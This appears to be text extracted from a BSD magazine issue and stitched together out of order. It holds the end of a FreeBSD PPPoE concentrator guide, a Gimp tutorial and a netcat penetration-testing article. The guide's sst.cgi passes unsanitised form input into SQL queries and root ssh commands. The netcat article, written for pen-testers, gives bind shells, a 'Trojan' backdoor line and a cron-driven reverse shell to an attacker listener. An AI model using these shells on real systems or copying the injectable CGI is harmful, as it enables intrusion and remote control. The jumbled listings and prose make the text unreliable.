echo '<input type="radio" name="option" value="1"> Client informations.' \
    '<input type="radio" name="option" value="2"> Drop client.<br>' \
    '<input type="radio" name="option" value="3"> Drop client ( forced ).<br>' \
    '<input type="radio" name="option" value="4"> Total connected clients.<br>'
echo '<br>'
echo '<input type="radio" name="option" value="6"> Ping.<br>'
echo '<table nowrap>' \
    '<tr><td>IP: </TD><TD><input type="text" name="ip" size=20></td></tr>' \
    '</table>'
echo '<br>'
echo '<input type="radio" name="option" value="5"> Change speed.<br>'
echo '<table nowrap>' \
    '<tr><td>Download speed (kb): </TD><TD><input type="text" name="vdown" size=20></td></tr>' \
    '<tr><td>Upload speed (kb): </TD><TD><input type="text" name="vup" size=20></td></tr>' \
    '<tr><td>Authorization key: </TD><TD><input type="text" name="key" size=20></td></tr>' \
    '</table>'
echo '<br><input type="submit" value="Send">' \
    '<input type="reset" value="Reset"></form>'

if [ "$REQUEST_METHOD" != "GET" ]; then
    echo "<hr>Script error:" \
        "<br>Usage error, cannot complete request, REQUEST_METHOD!=GET." \
        "<br>Check your FORM declaration and be sure to use METHOD=\"GET\".<hr>"
    exit 1
fi

if [ -z "$QUERY_STRING" ]; then
    exit 0
else
    # form fields: XX=cliente ZZ=option WW=vdown QQ=vup SS=key II=ip
    XX=`echo "$QUERY_STRING" | sed -n 's/^.*cliente=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    ZZ=`echo "$QUERY_STRING" | sed -n 's/^.*option=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    WW=`echo "$QUERY_STRING" | sed -n 's/^.*vdown=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    QQ=`echo "$QUERY_STRING" | sed -n 's/^.*vup=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    SS=`echo "$QUERY_STRING" | sed -n 's/^.*key=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    II=`echo "$QUERY_STRING" | sed -n 's/^.*ip=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`

    if [ "$ZZ" = 6 ]
    then
        if [ -z "$II" ]
        then
            echo "<hr> None entered IP. <hr>"
            new_query_form
            exit 0
        else
            if expr "$II" : '[0-9.]*$' > /dev/null
            then
                for i in 1 2 3 4
                do
                    if [ "$(echo $II | cut -d "." -f $i)" -gt 255 ]
                    then
                        echo "<hr> Invalid IP. <hr>"
                        new_query_form
                        exit 0
                    fi
                done
                ping=$(ping -c 10 $II)
                echo "<pre>"
                # quoting keeps ping's line breaks (the printed listing rebuilt them with sed)
                echo "$ping"
                echo "</pre>"
                new_query_form
                exit 0
            else
                echo "<hr> Invalid IP. <hr>"
                new_query_form
                exit 0
            fi
        fi
    fi

    if [ "$ZZ" = 4 ]
    then
        # one ng interface per PPPoE session
        ppp_alive=$(ifconfig -l | tr ' ' '\n' | grep -c '^ng')
        echo "<hr> Customers connected on `uname -n`: "$ppp_alive" <hr>"
        new_query_form
        exit 0
    fi

    if [ -z "$XX" ]
    then
        echo "<hr> No customer entered. <hr>"
        new_query_form
        exit 0
    fi

    if [ -z "$ZZ" ]
    then
        echo "<hr> No option selected. <hr>"
        new_query_form
        exit 0
    fi

    if [ "$ZZ" = 1 ]
    then
        c_user=`$radius"select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
        if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
        then
            c_ip=`$radius"select value from radreply where username='$c_user' and attribute='Framed-IP-Address';" 2> /dev/null`
            if [ -z "$c_ip" ]
            then
                # no fixed address: take the last one handed out from the pool
                c_ip=`$radius"select framedipaddress from radippool where username='$c_user' ORDER BY expiry_time DESC limit 1;" 2> /dev/null`
                c_ip_first=`echo $c_ip | cut -d"." -f1`
                if [ "$c_ip_first" = 10 ]
                then
                    c_ip_tipo="Dynamic Private"
                else
                    c_ip_tipo="Dynamic Public"
                fi
            else
                c_ip_first=`echo $c_ip | cut -d"." -f1`
                if [ "$c_ip_first" = 10 ]
                then
                    c_ip_tipo="Private Fixed"
                else
                    c_ip_tipo="Public Fixed"
                fi
            fi
        else
            echo "<hr> Customer invalid. <hr>"
            new_query_form
            exit 0
        fi

        c_plano=`$radius"select groupname from usergroup where username='$c_user' limit 1;" 2> /dev/null`
        c_bloqueado=`$radius"select bloqueado from radcheck where attribute='ClearText-Password' and UserName='$c_user';" 2> /dev/null`
        if [ -z "$c_bloqueado" ]
        then
            c_bloqueado=`$radius"select bloqueado from radcheck where attribute='Password' and UserName='$c_user';" 2> /dev/null`
        fi
        if [ "$c_bloqueado" = 0 ]
        then
            c_bloqueado="No"
        else
            c_bloqueado="Yes"
        fi

        if [ -z "$c_ip" ]
        then
            echo "<hr> Customer without IP. <hr>"
            new_query_form
            exit 0
        fi
        echo "<hr> Customer: "$c_user" <br> IP: "$c_ip" ("$c_ip_tipo") <br> Plan: "$c_plano" <br> Blocked: "$c_bloqueado" <hr>"
    fi

    if [ "$ZZ" = 2 ]
    then
        c_user=`$radius"select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
        if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
        then
            # ask the radius host to send a Packet of Disconnect for the user
            sudo ssh -l root -p 2220 198.51.100.2 /root/scripts/pod_drop.sh $XX 2> /dev/null
            $radius"update radacct set acctstoptime=now() where acctstoptime is null and username='$XX';" 2> /dev/null
            echo "<hr> Customer "$XX" dropped. <hr>"
            new_query_form
            exit 0
        else
            echo "<hr> Customer invalid. <hr>"
            new_query_form
            exit 0
        fi
    fi

    if [ "$ZZ" = 3 ]
    then
        c_user=`$radius"select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
        if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
        then
            /root/scripts/drop_force $XX 2> /dev/null
            echo "<hr> Customer "$XX" dropped. <hr>"
            new_query_form
            exit 0
        else
            echo "<hr> Customer invalid. <hr>"
            new_query_form
            exit 0
        fi
    fi

    if [ "$ZZ" = 5 ]
    then
        if [ "$SS" = "$pass" ]
        then
            c_user=`$radius"select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
            if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
            then
                # speed-change script on the radius host (its name is partly illegible in the source)
                sudo ssh -l root -p 2220 198.51.100.2 /root/scripts/change_speed.sh $XX $WW $QQ 2> /dev/null
                echo "<hr> Customer "$XX" with speed changed to "$WW"kb download and "$QQ"kb upload. <hr>"
                echo "Customer "$XX" with speed changed to "$WW"kb download and "$QQ"kb upload the date `date`." >> /tmp/sst_log
                echo "Customer "$XX" with speed changed to "$WW"kb download and "$QQ"kb upload the date `date`." >> /var/log/messages
                new_query_form
                exit 0
            else
                echo "<hr> Customer invalid. <hr>"
                new_query_form
                exit 0
            fi
        else
            echo "<hr> Invalid Password, this event will be logged for security reasons. <hr>"
            echo "Attempt to access invalid, password "$SS" the date `date`." >> /tmp/sst_log
            echo "Attempt to access invalid, password "$SS" the date `date`." >> /var/log/messages
            new_query_form
            exit 0
        fi
    fi
    echo "<br>"
fi
new_query_form
echo '</body>'
echo '</html>'
exit 0
#eof
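An added example, not code from the article, showing a validation layer sst.cgi could run on its query-string fields before any of them is handed to mysql, ssh or ping. The field names and option numbers are the ones the CGI uses; the character set for customer names, the length limits and the speed range are assumptions to adjust to your RADIUS naming scheme.

```shell
#!/bin/sh
# Pull one field out of QUERY_STRING the way sst.cgi does, but without
# letting other fields' text leak into the value: split on '&' first.
# $1 = query string, $2 = field name. Prints the value (may be empty).
qs_get() {
    printf '%s\n' "$1" | tr '&' '\n' | sed -n "s/^$2=//p" | head -n 1 \
        | sed 's/%20/ /g; s/+/ /g'
}

# RADIUS user names: letters, digits, dot, underscore, hyphen, @; 1-64 chars
# (assumed scheme). Anything else, quotes and spaces included, is refused.
valid_customer() {
    printf '%s' "$1" | grep -Eq '^[A-Za-z0-9._@-]{1,64}$'
}

# Only the six options the form offers.
valid_option() {
    case "$1" in
        1|2|3|4|5|6) return 0 ;;
        *) return 1 ;;
    esac
}

# Dotted quad with every octet in 0..255; sst.cgi only checked "> 255" per
# field and accepted anything expr's [0-9.]* matched, such as "1.2".
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Speeds in kb: plain integer between 1 and 1000000 (assumed range).
valid_speed() {
    printf '%s' "$1" | grep -Eq '^[0-9]{1,7}$' && [ "$1" -ge 1 ] && [ "$1" -le 1000000 ]
}

# Check every field the chosen option will use. Prints "ok" or the reason
# and returns non-zero on the first problem, so the CGI can stop before
# running any command with the input.
sst_validate() {
    qs=$1
    option=$(qs_get "$qs" option)
    cliente=$(qs_get "$qs" cliente)
    ip=$(qs_get "$qs" ip)
    vdown=$(qs_get "$qs" vdown)
    vup=$(qs_get "$qs" vup)

    valid_option "$option" || { echo "bad option"; return 1; }
    case "$option" in
        1|2|3|5) valid_customer "$cliente" || { echo "bad customer"; return 1; } ;;
    esac
    if [ "$option" = 6 ]; then
        valid_ipv4 "$ip" || { echo "bad ip"; return 1; }
    fi
    if [ "$option" = 5 ]; then
        { valid_speed "$vdown" && valid_speed "$vup"; } || { echo "bad speed"; return 1; }
    fi
    echo ok
    return 0
}
```

In the CGI this would sit right after the XX/ZZ/... assignments, with `sst_validate "$QUERY_STRING" || exit 0` replacing the per-option checks it currently lacks.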
    c_ip_first=`echo $4 | cut -d"." -f1`
    /usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/netflow/$1.ctl shutdown
else
    c_ip6=$4
fi

Consider 203.0.113.15:700 as the ip:port of the NetFlow collector. Create the startup scripts: Listing 29 (ppp-up) and Listing 30 (ppp-down).

Permissions to be executable:

# chmod +x /root/scripts/ppp-down


The following script drops, once a day, the customers that have been blocked: Listing 31.

Permissions to be executable:

# chmod +x /root/scripts/drop_blocked

Add it to cron to run daily:

# crontab -e
00 21 * * * /root/scripts/drop_blocked

This script serves to drop the client locally, but in a forced manner: Listing 32.

Permissions to be executable:

# chmod +x /root/scripts/drop_force


I'm using radvd to generate RA and quagga for redistribution. It could be done with rtadvd or dhcpv6; the most





Listing 35.

# vi /usr/local/etc/nginx/nginx.conf

worker_processes 1;

events {
    worker_connections 1024;
}

http {
    include mime.types;
    default_type application/octet-stream;
    sendfile on;

    # small buffers and short timeouts: this server only serves the support
    # cgi, the blocked page and the log proxy
    client_body_timeout 12;
    client_header_timeout 12;
    keepalive_timeout 15;
    send_timeout 10;
    client_body_buffer_size 10K;
    client_max_body_size 8m;
    client_header_buffer_size 1k;
    large_client_header_buffers 2 1k;

    server {
        listen 203.0.113.5:80;
        server_name localhost;
        charset utf-8;

        location / {
            root /usr/local/www/nginx;
            index index.html index.htm;
        }

        location /sst {
            root /usr/local/www/nginx/sst;
            rewrite (.*)$ /$1.cgi break;
            fastcgi_pass unix:/var/run/fcgiwrap/fcgiwrap.sock;
            fastcgi_param SCRIPT_FILENAME /usr/local/www/nginx/$fastcgi_script_name;
            include fastcgi_params;
            # only the support workstation may reach the cgi
            allow 203.0.113.26/32;
            deny all;
        }

        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
            root /usr/local/www/nginx-dist;
        }
    }

    server {
        listen 203.0.113.5:666;
        server_name localhost;
        charset utf-8;

        location / {
            # log.io web server, bound to localhost (Listing 36)
            proxy_pass http://127.0.0.1:28778;
        }
    }
}
#eof
Figure 6. nf_traffic (total 558.7 Mb/s; tcp: 476.9 Mb/s, udp: 81.7 Mb/s, icmp: 40.4 kb/s, other: 753.8 b/s)
Listing 36.

# cat /root/.log.io/harvester.conf
exports.config = {
  nodeName: "pppoe",
  logStreams: {
    mpd5: [
      "/var/log/mpd5.log"
    ]
  },
  server: {
    host: '127.0.0.1',
    port: 28777
  }
}
#eof

# cat /root/.log.io/log_server.conf
exports.config = {
  host: '127.0.0.1',
  port: 28777
}
#eof

# cat /root/.log.io/web_server.conf
exports.config = {
  host: '127.0.0.1',
  port: 28778,

  /*
  // Enable HTTP Basic Authentication
  auth: {
    user: "admin",
    pass: "1234"
  },
  */

  /*
  // Enable HTTPS/SSL
  ssl: {
    key: '/path/to/privatekey.pem',
    cert: '/path/to/certificate.pem'
  },
  */

  /*
  // Restrict access to websocket (socket.io)
  // Uses socket.io 'origins' syntax
  restrictSocket: '*:*',
  */

  /*
  // Restrict access to http server (express)
  restrictHTTP: [
    "192.168.29.39",
    "10.0.*"
  ]
  */
}
#eof
important thing is that the mpd5 provides a connection via link-local client-server. It is not interesting that the irqs keep changing between cores of the processors, so let's fix them, bearing in mind that this can vary depending on your hardware. Create the rc for cpu_affinity: Listing 33.

Now let's create the cgi script for support: Listing 34.

Permissions to be executable:

# chmod +x /usr/local/www/nginx/sst/sst.cgi


Let's configure sudo, otherwise you will have permission issues with nginx when using the SST. Add these lines at the end of the file:

# vi /usr/local/etc/sudoers
User_Alias WEB = www
WEB ALL = NOPASSWD: /usr/bin/ssh

Let's set nginx for the support system, the log system and the informative page for blocked customers. Edit /usr/local/etc/nginx/nginx.conf: Listing 35.


Listing 37.

# touch /usr/local/etc/rc.d/log_io
# chmod 755 /usr/local/etc/rc.d/log_io
# cat /usr/local/etc/rc.d/log_io

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot) br
#1414503716
# REQUIRE: LOGIN
#
# Add the following lines to /etc/rc.conf to enable log.io-server and log.io-harvester at startup
# log_io_enable (bool): Set to "NO" by default.
# Set it to "YES" to enable log.io-server and log.io-harvester

. /etc/rc.subr

name=log_io
rcvar=${name}_enable
#rcvar=log_io_enable
load_rc_config $name
: ${log_io_enable:=NO}
start_cmd="${name}_start"

Create a blocked informative page; it may contain a customer area and more, creativity is the limit!

# vi /usr/local/www/nginx/index.html
<html>
<head>
<title></title>
</head>
<body>
<p>
Customer blocked, contact the Company Lorem Ipsum. </p>
</body>
</html>


Let's configure postfix: edit /etc/mail/aliases, uncomment the root alias and input your email address to receive important information from your server.

Run the line below so that postfix runs on localhost and starts functioning properly:

stop_cmd="${name}_stop"

log_io_start()
{
    echo "Starting log.io-server."
    /usr/local/bin/log.io-server >/dev/null 2>&1 &
    echo "Starting log.io-harvester."
    /usr/local/bin/log.io-harvester >/dev/null 2>&1 &
}

log_io_stop()
{
    echo "Stopping log.io-server."
    echo "Stopping log.io-harvester."
    # both run under node, so one killall ends them
    /usr/bin/killall node >/dev/null 2>&1
}

run_rc_command "$1"
#eof
Figure 7. pppoe_en

# postconf -e "alias_maps = hash:/etc/mail/aliases" && postconf -e "inet_interfaces = localhost" && rm -rf /etc/mail/aliases.db && newaliases && postalias /etc/mail/aliases

Let's set the log.io: Listing 36. Create the rc for log.io: Listing 37.

Permissions to be executable:

# chmod +x /usr/local/etc/rc.d/log_io

Access your support system -> http://203.0.113.5/sst/sst and authentication logs -> http://203.0.113.5:666/.
simple topology for implementation of pppoe concentrator

If you got this far, your work is accomplished, set to run! For any questions I am available by email: tfgoncalves(at)connectionlost(dot)com(dot)br. The feedback may take time because mail flow here is a little high, but I will reply. Contributions and new ideas are always welcome. bsd rOx!

TIAGO FELIPE GONCALVES
Getting to Grips with the Gimp - Part 9

In the penultimate part in our series on the Gimp we will look at how to create a 3d package for a FreeBSD carton that is print ready.

What you will learn...
• How to manipulate images like a design pro

What you should know...
• General PC administration skills

In this tutorial we will create a realistic 3D object using the perspective tool that could potentially be used for packaging any product. The key to this is accuracy and scaling, as any mismatch will ruin the final image.

Download the images from Table 1.

Table 1. Details and credits

Resource | URL | Details and credit
FreeBSD website | https://www.freebsd.org/logo/logo-basic.png | FreeBSD Logo and fonts
CPU core | http://www.freeimages.com/photo/759887 | Gold roubles: 10 russian gold roubles and CPU by styf22
Power button | http://www.freeimages.com/photo/675014 | Power Button: Hard drive power button by jmonte

BSD 11/2014 MAGAZINE

Step 1
Open the CPU image [Figure 1].

Step 2
Rescale the image to 2800px with the constraint disabled [Figure 2].

Step 3
Select Layer - Layer to image size. Use the colour picker tool, select a region in the core of the CPU and fill the right hand side of the expanded image [Figure 3].


Step 4
Create a new layer and click back on the original layer. Select some CPU pins from the lower left hand side using the lasso tool, copy the selection and paste into the new layer. Temporarily reduce the opacity of the layer while aligning so you can overlay the pins accurately [Figure 4].
Step 5
Open the FreeBSD logo image and select and copy the transparent Red Daemon sphere. Create a new layer in the CPU image and paste the result. Click on the scale tool and ensure the constrain is enabled. Scale the image to neatly overlay the coin [Figure 5, 6].

Step 6
Add a new layer. Hide all the other layers. Copy the transparent FreeBSD text in black into the new layer. With constrain enabled, scale to 1500px and anchor the layer. Add a new layer. Set the foreground colour to #ff3300, select a square bounding box around "BSD" and fill with red. Repeat with the "Free" text and fill with white. Set the layer to Addition. Reveal the other layers and move the FreeBSD text to the edge of the CPU die. Select Layer - Layer to image size [Figure 7].
Step 7
Set the resolution of the image to 300 pixels/in in both axes (Image - Scale). Create a new image with the same resolution, 760 x 3884 pixels. Select the light and dark blue from the left hand side of the original image using the pick tool and set the foreground and background accordingly. Switch to the new image and use the gradient blend tool to fill the new image [Figure 8].

Step 8
Scale both the side and front images to 50% constrained. Open the hard drive light image and use the clone tool to remove the symbol engraved on the right hand side. Crop so that the switches are central [Figure 9].
Step 9
Add a new layer to the side image and paste then scale the switches so they line up in the centre of the image. Add "The power to serve" text, adjusting the kerning and size to fit the maximum width. Set the switch layer to hard light [Figure 10].

Step 10
Merge visible layers on both images. Create a new page with a white background 3000 x 2500 px. Add a guide at 50% of the vertical (Image - Guides by percent). Add a horizontal guide part way down from the top of the page. Create two new layers, copy and paste the side image and front images into separate layers. Add two vertical guides, one aligned against the "P" and one intersecting the "S" [Figure 11].
Step 11
Click on the left hand layer and using the square selection tool, outline the left hand panel. Click on the perspective tool and align the vertical axis to match the left-hand guide then click on Transform. Anchor the layer. Repeat with the right hand panel and the right hand guide [Figure 12].

Step 12
Merge down the two layers, and add a shadow with 0 x offset and 20 y offset and blur radius. Give the shadow a 40% opacity. Crop and export as required [Figure 13].

ROB SOMERVILLE

Rob Somerville has been passionate about technology since his early teens. A keen advocate of open systems since the mid-eighties, he has worked in many corporate sectors including finance, automotive, airlines, government and media in a variety of roles from technical support, system administrator, developer, systems integrator and IT manager. He has moved on from CP/M and nixie tubes but keeps a soldering iron handy just in case.
Pen Testing and Audit. Part 3

Netcat comes in handy when engaged in a penetration test. In the event that you find a shell, it may not be feasible to upload large amounts of data, but netcat is small (and also exists natively on many UNIX/Linux systems). There is also a port of netcat for Windows, which means it can be loaded onto a Windows host over a shell exploit.

Once on the internal host, you can extend what you have done by scanning the internal network, INSIDE the firewall.


Netcat - the tester's best friend

Sending to and from separate hosts is possible. The idea here is to have netcat set up as a listener on the host that is collecting the data and for it to be running on a second host that is spoofing the source address. The "-s" (local source address) option and netcat's "-g" (source-routing hop point) option add to this ability. Bear in mind that a spoofed TCP source cannot complete the three-way handshake, so this is really only useful for one-way UDP sends, and that source-routed packets are dropped by almost every modern router.

The "-i N" option defines the delay interval that sends one line every N seconds (do not confuse it with "-w N", the connect and final-read timeout used throughout this article). Another option that can be considered is "-o file", a hex dump (to the named file) of transmitted and received data.


Vulnerability Scanning with Netcat

Netcat has a number of pre-existing scripts that allow it to act as a simple vulnerability scanner. It does this by connecting to the port to be tested, sending data that tests for a vulnerability and returning the result. Commonly available test scripts include those for:

1. RPC (Remote Procedure Calls), both the *NIX (port 111) and Windows (port 135) versions
2. FTP (proxy tests, PASV bugs, etc.)
3. Password testing (along the lines of Brutus); that is, you can try a dictionary attack and test a system's passwords
4. Mapping and exporting a file system
5. Testing trust relationships (such as the "r" commands)
6. SSL; yes, there is an SSL-capable version of netcat and it can be used to test SSL links
7. A Web and CGI scanner
8. Many more ...

Reporting the results is another issue; you know that the vulnerability is there, the output is just not pretty.

Then there is scripting again:

    # perl -e 'print "A"x1024' | nc -v [host] [port]

A little fuzzing never hurt ... but then again ... In the perl sample above, we see how we can send a large volume of data to a listening port (the pipe feeds perl's output into netcat's standard input). This all goes to show how a simple command can be made into a truly powerful tool.


Testing and making connections to open ports with Netcat

When testing a system, netcat has a few things you should remember:

• It is faster than a speeding Telnet.
• Easy to drop with a CTRL-C.
• Handles raw data in a single bound.

Yes, it's not a bird or a plane, it is netcat. Netcat is far faster than Telnet, without the overhead and translation. This makes it superior for forensic data transfers: unlike Telnet, netcat does not add or negotiate any characters, so what goes in one end comes out the other byte for byte.

Next, netcat can connect over UDP. This means it can be used as a simple "Telnet" client and server, even over UDP. You set up communications as follows:

On the Server:

    # nc -l -p [port] -e /bin/csh

Or in Windows:

    C:\> nc -l -p [port] -e cmd.exe

(cmd.exe is found via PATH; spell out the full path if it is not. The "-e" option only exists in netcat builds compiled with GAPING_SECURITY_HOLE defined, such as the traditional netcat package on Debian and the Windows port; OpenBSD's nc does not have it.)

If the aim is to have a UDP "telnet" style client over UDP 53, just run:

    # nc -l -u -p 53 -e /bin/csh

Can we say a simple backdoor?

On the Client:

    # nc [ServerIPAddress] [port]

So to connect to the listener above on UDP 53 at IP address 192.168.10.123 we would use:

    # nc -u 192.168.10.123 53

It is all really easy when you think about it. This is why it is SO EASY to bypass firewalls and routers that allow DNS traffic (or any default rules). This is why it is CRITICAL that there are restrictions on all rules that have ANY system to ANY system access.


Acting as a virtual server or honeypot

Netcat can simulate any TCP or UDP service; the binary ones are far more complicated, but are still possible. If we take the simple example of a Web server that we wish to create as a honeypot, the process is to serve a page and log the results.

Make a webserver:

    while true; do nc -l -p 80 -q 1 < /tmp/index.html; done

Run the script line above, then you could log the netstat and other packets, set up snort, etc. Or you could integrate logging. Netcat's standard input is the page it serves and its standard output is whatever the client sent, so the client's request is what we pipe into the logging loop:

    while true; do
        nc -l -p 80 -q 1 < /tmp/index.html | { while read REPLY; do echo "`date` < $REPLY" >> log.txt; echo $REPLY; done; }
    done

To add a proxy or client header and fool simple systems, feed the request into netcat (HTTP lines end in CRLF and the request is terminated by a blank line):

    # printf 'GET / HTTP/1.1\r\nHost: google.com\r\nUser-Agent: Mozilla Version 2800.1 (one day)\r\nReferer: Not.my.site.com\r\n\r\n' | nc google.com 80

To make a log with times, etc., the script needs to be spawned, but the idea is there. This can be done for nearly any service or port but, of course, there are always simpler ways to do this.


Netcat - the simple port-scan logger

The following is a small script to make Netcat into a simple Port Scan Logger. A little more and it can become a simple Honeypot:

    # while true; do nc -l -p [port to monitor] -e /bin/record.sh; done >> /tmp/port_connections.txt

This calls a script, /bin/record.sh. There are other ways to do this, but this is a quick and easy example. This script is as follows:

    #!/bin/sh
    # port_mon.sh
    # Netcat script to record port scan details.
    #
    cat | { while read REPLY; do echo "`date` > $REPLY" >> log.txt; echo $REPLY; done; } | \
        netcat -v -v -l -w 3 -p [port monitored] | \
        { while read REPLY; do echo "`date` < $REPLY" >> log.txt; echo $REPLY; done; }

This logs all connections to a single port, together with each line the remote end sent; the connecting IP address is printed by "-v -v" on standard error (add 2>&1 if you want it in the same file). It is a continuous loop; that is, when a connection is made, netcat will be respawned and ready to record another attempt.

Alternatively, we can log to syslog by adding:

    echo '<0>message' | nc -w 1 -u loghost 514

(the "<0>" is the syslog priority field, facility times eight plus severity, that precedes the message; "<13>" would be user.notice.)

Now, if we want to monitor several ports, a little extra scripting and we have a simple port scan monitor. The same loop idiom, with "-z" (zero-I/O mode), turns netcat into a quick port scanner as well, here over ports 1 to 254 of a target:

    for p in $(seq 1 254); do nc -v -w 3 -z [target host] $p; done
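The logging pieces above can be tidied into a small script that keeps the netcat loop on one line and moves the timestamping into a function reused by both the HTTP honeypot and the bare port monitor. This is an added example, not the author's script: the netcat flags (-l -p -q) are the GNU/Debian netcat ones used throughout this article, and the log path and the sample request used in the test are assumptions. It also strips control characters from what the client sends, so a scanner cannot forge log entries or drop terminal escape sequences into a log you later cat to your screen.

```shell
#!/bin/sh
# portmon.sh - added example: netcat-driven connection logger / honeypot.
# Assumes GNU/Debian netcat flags (-l -p -q) as used on this page.
# The LOG path is an assumption; override it in the environment.

LOG=${LOG:-/tmp/port_connections.txt}

# log_lines TAG: read what the remote end sent (one line per read) from
# stdin and append each line to $LOG as "<UTC timestamp> [TAG] <line>".
# Everything but printable ASCII (CR, ESC, NUL, ...) is removed so a
# hostile client cannot inject fake entries or terminal escapes.
# Prints the number of lines logged.
log_lines() {
    tag=$1
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        clean=$(printf '%s' "$line" | tr -cd '[:print:]')
        printf '%s [%s] %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$tag" "$clean" >> "$LOG"
        n=$((n + 1))
    done
    echo "$n"
}

# serve_once PORT FILE: answer a single TCP connection on PORT with the
# contents of FILE (netcat sends its stdin to the client) and log what
# the client sent (netcat's stdout). "-q 1" closes the connection one
# second after stdin hits EOF.
serve_once() {
    nc -l -p "$1" -q 1 < "$2" | log_lines "port $1" > /dev/null
}

# honeypot PORT FILE: respawn the listener after every connection so the
# fake service never goes away. Ctrl-C stops it.
honeypot() {
    while :; do serve_once "$1" "$2"; done
}

# listen_only PORT: the port-scan logger from the article. Nothing is
# served; every connection and whatever was sent is recorded.
listen_only() {
    while :; do nc -l -p "$1" -w 3 | log_lines "port $1" > /dev/null; done
}

# count_hits TAG: how many log lines were recorded under TAG.
count_hits() {
    grep -c "\[$1\]" "$LOG" 2>/dev/null || true
}
```

Source the file and run "honeypot 80 /tmp/index.html" (as root, for a port below 1024) or "listen_only 23", then tail the log; count_hits "port 80" gives you the hit count per monitored port.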


Netcat to send files

Netcat helps in sending files. We can tar and compress (or gzip) the files contained within a specified directory and then pipe the data through a netcat client. The "-w" option provides a few seconds of delay prior to a timeout. This covers the problem of temporary disconnects and intermittent traffic flow.

To move the file from a listener to the netcat client we first need to configure a listener.

    # nc -l -p 53 < /tmp/the_file_name.bin

Next, a client.

    # nc [IP Address of Listener] 53 > /tmp/the_file_name.bin

Pushing a file from the client to the netcat listener. Again, we set up a listener.

    # nc -l -p 53 > /tmp/the_file_we_want_to_copy.bin

And the client.

    # nc [IP Address of Listener] 53 < /tmp/The_File_we_saved.bin

This is just the reverse of what we did at first. This allows the sending or receiving of files. Files are sent as raw bytes, so binary and text alike go through unchanged; netcat does no line-ending translation, which is why text moved between *NIX and Windows may need conversion afterwards. Check the transfer with md5sum or sha256sum on both ends: netcat gives no indication that a connection was dropped part way through.


Netcat is also able to be used as a Forwarder and Relay

I am not going to go into detail here but, if you think about it, there is no reason why a single netcat listener is the end of what you can do. Chaining netcat can allow it to pass through multiple layers and systems. In pen-tests, red teaming and even on the darker side of the fence, this technique is used to "drill" through firewalls and security systems.

More than this, netcat can chain across different protocols. It is possible to pipe one connection type into another. A connection to DNS (UDP 53) can be changed to HTTP (TCP 80), etc.

All of this just touches the surface of what netcat does. I would suggest that you search and find out more. There are always more uses of netcat.


Netcat as a Trojan

Netcat can also be used as a backdoor into a system and a remote shell. It is all too easy ...

The following starts netcat in listen mode on the host you wish to Trojanise:

    # nc -l -p [port] -e /bin/ksh

Once it is running, use telnet (or netcat) to connect to that port. Of course, you can listen on either TCP or UDP. In fact, adding this line to a start-up script could allow you to selectively send connections to a valid service or the "Trojan".

For instance, if you can obtain shell access through a DNS vulnerability with BIND, you could load a netcat startup and allow future access while patching the issue to stop further attacks. Even simple tools can be used in both positive and negative ways.


A replay attack engine

Netcat can be used as a replay attack engine. It works well for this purpose and is simple to use. The first part is to actually collect the information stream (the data) that you want to replay. This can be done by using another tool to create the stream or by just capturing (tcpdump or wireshark) a stream and altering the parts that do not fit. Change the times, IP addressing, destinations, values, etc. to make the captured stream suit what you want. To replay the data, netcat in client mode will suffice:

    $ cat file.capture.bin | nc [destination IP] [port]

or even:

    $ nc [destination IP] [port] < file.capture.bin

Either will work. Netcat in listen mode, tcpdump or wireshark can be used to make the initial capture. For the replay itself, tcpreplay works better for this task, as it resends whole packets from a pcap file, whereas netcat only ever replays the application payload over a fresh connection; but netcat just looks cooler (in a geek sense).

Hence, netcat can be used to replay packets.


Egress filtering and netcat 

First | had better explain to everyone what Egress filters 
are. Most people understand the idea of Ingress filtering. 
This is stopping things coming into the network. Most peo- 
ple will agree that letting anything into the network from 
the Internet willy-nilly is a bad idea. But what are Egress 
filters and why are they necessary? 

An Egress filter is a block on traffic leaving your net- 
work. This may not sound too nefarious, but it is not just 
the insiders who can damage your network from the in- 
side. An external attacker can “push” a session from the 
client to a listener. That is they can make a shell connec- 
tion from your server using outgoing traffic to get an in- 
coming connection to your internal systems. 


Shoveling a shell

You may think that it is not possible to get an incoming shell from the Internet because you block incoming traffic. If you do, you are mistaken. There is an attack method known as shoveling a shell, or just a shoveling shell. Netcat is a common tool for launching this attack. The attacker would set up netcat as follows:

Listener (on the attacker's host):

    # nc -l -p [port no]

Client (on the compromised host):

    # nc [listenerIP] [port] -e /bin/sh

The firewall will see this as an outgoing connection from the system. It is, in reality, an incoming interactive shell. It is also a common way of using that buffer overflow condition; take your pick of the latest one hitting the streets.

Generally, the client is activated at regular intervals through cron. The attacker starts a netcat listener and waits for the connection from the system being attacked. The system being attacked is generally configured to use a common port that is allowed through your firewall and expected. Ports such as TCP 25 (SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. If the attacker is really smart, they will tie the connection to UDP and bind it to something like UDP 53 (DNS) as it is rarely blocked (nc -u: UDP mode).

